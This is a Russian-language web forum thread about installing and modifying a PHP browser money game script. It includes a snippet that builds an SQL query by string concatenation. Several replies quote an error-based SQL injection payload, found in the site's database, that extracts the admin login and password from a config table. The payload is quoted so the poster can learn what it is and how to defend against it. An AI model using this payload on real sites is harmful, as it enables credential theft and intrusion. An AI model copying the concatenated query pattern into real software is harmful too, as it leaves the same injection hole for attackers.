dima20010628
Участник
- Сообщения
- 83
- Реакции
- 10
Помойму ни как,по крайней мере я не видел такого ни на одном проекте,но всё возможно если захотетьDmytro777 написал(а):так а как исправить что б на маил приходило и на гмаил, щас кстати попробую яндекс востановить
Dmytro777
Участник
- Сообщения
- 12
- Реакции
- 0
mdsf123
Участник
- Сообщения
- 8
- Реакции
- 0
В папки в которых находятся файлыmdsf123 написал(а):Извините,там написано,залить согласно директориям,это как?
vitya1998
Участник
- Сообщения
- 24
- Реакции
- 0
inc/user_menu.phpvitya1998 написал(а):<?
$usid = $_SESSION["user_id"];
$db->Query("SELECT * FROM wmrush_pm WHERE user_id_in = '$usid' AND status = 0 AND inbox = 1");
$sk = $db->NumRows();
if ($sk > 0) {$pmm = '<font color="red">('.$sk.')</font>';} else {$pmm = '<font color="red">(0)</font>';}
куда это вставить
vitya1998
Участник
- Сообщения
- 24
- Реакции
- 0
<div class="acc-title"><?=$_SESSION["user"]; ?></div>
<div class="field-gr"><a href="/account">Мой профиль</a></div>
<div class="field-gr"><a href="/account/farm">Фруктовая ферма</a></div>
<div class="field-gr"><a href="/account/store">Фруктовый склад</a></div>
<div class="field-gr"><a href="/account/market">Торговая лавка</a></div>
<div class="field-gr"><a href="/account/bonus">Ежедневный бонус</a></div>
<div class="field-gr"><a href="/account/lottery">Лотерея</a></div>
<div class="field-gr"><a href="/account/knb">КНБ</a></div>
<div class="field-gr"><a href="/account/swap">Обменник</a></div>
<div class="field-gr"><a href="/account/referals">Ваши рефералы</a></div>
<?
$usid = $_SESSION["user_id"];
$db->Query("SELECT * FROM wmrush_pm WHERE user_id_in = '$usid' AND status = 0 AND inbox = 1");
$sk = $db->NumRows();
if ($sk > 0) {$pmm = '<font color="red">('.$sk.')</font>';} else {$pmm = '<font color="red">(0)</font>';}
?>
<div class="field-gr"><a href="/account/pm">Внутренняя почта <?=$pmm; ?></a></div>
<div class="field-gr"><a href="/account/insert">Пополнить баланс</a></div>
<div class="field-gr"><a href="/account/payment">Заказать выплату</a></div>
<div class="field-gr"><a href="/account/config">Настройки</a></div>
<div class="field-gr"><a href="/?menu=support"> Суппорт</a></div>
<div class="field-rd"><a href="/account/exit">Выход из профиля</a></div>
<div style="margin-top:20px;">
<div class="acc-title">Состояние счета</div>
<div class="field-ar"><a href="/account/insert">{!BALANCE_B!}</a> <span style="margin:3px 10px 0px 0px;">[для покупок]</span></div>
<div class="field-ars"><a href="/account/payment">{!BALANCE_P!}</a> <span style="margin:3px 10px 0px 0px;">[на вывод]</span></div>
</div>
это вот так получится
<div class="field-gr"><a href="/account">Мой профиль</a></div>
<div class="field-gr"><a href="/account/farm">Фруктовая ферма</a></div>
<div class="field-gr"><a href="/account/store">Фруктовый склад</a></div>
<div class="field-gr"><a href="/account/market">Торговая лавка</a></div>
<div class="field-gr"><a href="/account/bonus">Ежедневный бонус</a></div>
<div class="field-gr"><a href="/account/lottery">Лотерея</a></div>
<div class="field-gr"><a href="/account/knb">КНБ</a></div>
<div class="field-gr"><a href="/account/swap">Обменник</a></div>
<div class="field-gr"><a href="/account/referals">Ваши рефералы</a></div>
<?
$usid = $_SESSION["user_id"];
$db->Query("SELECT * FROM wmrush_pm WHERE user_id_in = '$usid' AND status = 0 AND inbox = 1");
$sk = $db->NumRows();
if ($sk > 0) {$pmm = '<font color="red">('.$sk.')</font>';} else {$pmm = '<font color="red">(0)</font>';}
?>
<div class="field-gr"><a href="/account/pm">Внутренняя почта <?=$pmm; ?></a></div>
<div class="field-gr"><a href="/account/insert">Пополнить баланс</a></div>
<div class="field-gr"><a href="/account/payment">Заказать выплату</a></div>
<div class="field-gr"><a href="/account/config">Настройки</a></div>
<div class="field-gr"><a href="/?menu=support"> Суппорт</a></div>
<div class="field-rd"><a href="/account/exit">Выход из профиля</a></div>
<div style="margin-top:20px;">
<div class="acc-title">Состояние счета</div>
<div class="field-ar"><a href="/account/insert">{!BALANCE_B!}</a> <span style="margin:3px 10px 0px 0px;">[для покупок]</span></div>
<div class="field-ars"><a href="/account/payment">{!BALANCE_P!}</a> <span style="margin:3px 10px 0px 0px;">[на вывод]</span></div>
</div>
это вот так получится
ну можно и так)мог и в верх поставитьvitya1998 написал(а):<div class="acc-title"><?=$_SESSION["user"]; ?></div>
<div class="field-gr"><a href="/account">Мой профиль</a></div>
<div class="field-gr"><a href="/account/farm">Фруктовая ферма</a></div>
<div class="field-gr"><a href="/account/store">Фруктовый склад</a></div>
<div class="field-gr"><a href="/account/market">Торговая лавка</a></div>
<div class="field-gr"><a href="/account/bonus">Ежедневный бонус</a></div>
<div class="field-gr"><a href="/account/lottery">Лотерея</a></div>
<div class="field-gr"><a href="/account/knb">КНБ</a></div>
<div class="field-gr"><a href="/account/swap">Обменник</a></div>
<div class="field-gr"><a href="/account/referals">Ваши рефералы</a></div>
<?
$usid = $_SESSION["user_id"];
$db->Query("SELECT * FROM wmrush_pm WHERE user_id_in = '$usid' AND status = 0 AND inbox = 1");
$sk = $db->NumRows();
if ($sk > 0) {$pmm = '<font color="red">('.$sk.')</font>';} else {$pmm = '<font color="red">(0)</font>';}
?>
<div class="field-gr"><a href="/account/pm">Внутренняя почта <?=$pmm; ?></a></div>
<div class="field-gr"><a href="/account/insert">Пополнить баланс</a></div>
<div class="field-gr"><a href="/account/payment">Заказать выплату</a></div>
<div class="field-gr"><a href="/account/config">Настройки</a></div>
<div class="field-gr"><a href="/?menu=support"> Суппорт</a></div>
<div class="field-rd"><a href="/account/exit">Выход из профиля</a></div>
<div style="margin-top:20px;">
<div class="acc-title">Состояние счета</div>
<div class="field-ar"><a href="/account/insert">{!BALANCE_B!}</a> <span style="margin:3px 10px 0px 0px;">[для покупок]</span></div>
<div class="field-ars"><a href="/account/payment">{!BALANCE_P!}</a> <span style="margin:3px 10px 0px 0px;">[на вывод]</span></div>
</div>
это вот так получится
vitya1998
Участник
- Сообщения
- 24
- Реакции
- 0
vladushka
Участник
- Сообщения
- 15
- Реакции
- 0
Пересохрани скрипт блокнотом в кодировке UTF-8DENIKA31 написал(а):Уменя нехрена неработает мне кажется это иза хостинга на денвере отображает хорошо на русском на хостинге нехочет хотя хостинг платный и несколько модулей такаяже беда вместо текста вопросы а вот на денвере всё окей
ForeverRED66
Участник
- Сообщения
- 18
- Реакции
- 0
вопрос,увидал у одного юзверя вот такое сообщения в базе, отправленное пользаку First ,пользак словил бан,а мне стало интересно.
' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '
пользака First и admin переименовал еще давно,но все же что значит этот код?
' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '
пользака First и admin переименовал еще давно,но все же что значит этот код?
Последнее редактирование:
Андрей
Участник
- Сообщения
- 241
- Реакции
- 55
Иньекция, которая показывает логин и пароль от админки.ForeverRED66 написал(а):вопрос,увидал у одного юзверя вот такое сообщения в базе, отправленное пользаку First ,пользак словил бан,а мне стало интересно.
' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '
пользака First переименовал еще давно,но все же что значит этот код?
ForeverRED66
Участник
- Сообщения
- 18
- Реакции
- 0
как можно защититься от подобного?Андрей написал(а):Иньекция, которая показывает логин и пароль от админки.
Андрей
Участник
- Сообщения
- 241
- Реакции
- 55
не ко мнеForeverRED66 написал(а):как можно защититься от подобного?
dima20010628
Участник
- Сообщения
- 83
- Реакции
- 10
valefo20
Местный
- Сообщения
- 71
- Реакции
- 4
Если ты этот код увидел у себя, значит боятся нечего. Все в норме. Твоя защита сработала. Проверьте сканером файлик. Дыр не меряно.ForeverRED66 написал(а):вопрос,увидал у одного юзверя вот такое сообщения в базе, отправленное пользаку First ,пользак словил бан,а мне стало интересно.
' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '
пользака First и admin переименовал еще давно,но все же что значит этот код?
valefo20
Местный
- Сообщения
- 71
- Реакции
- 4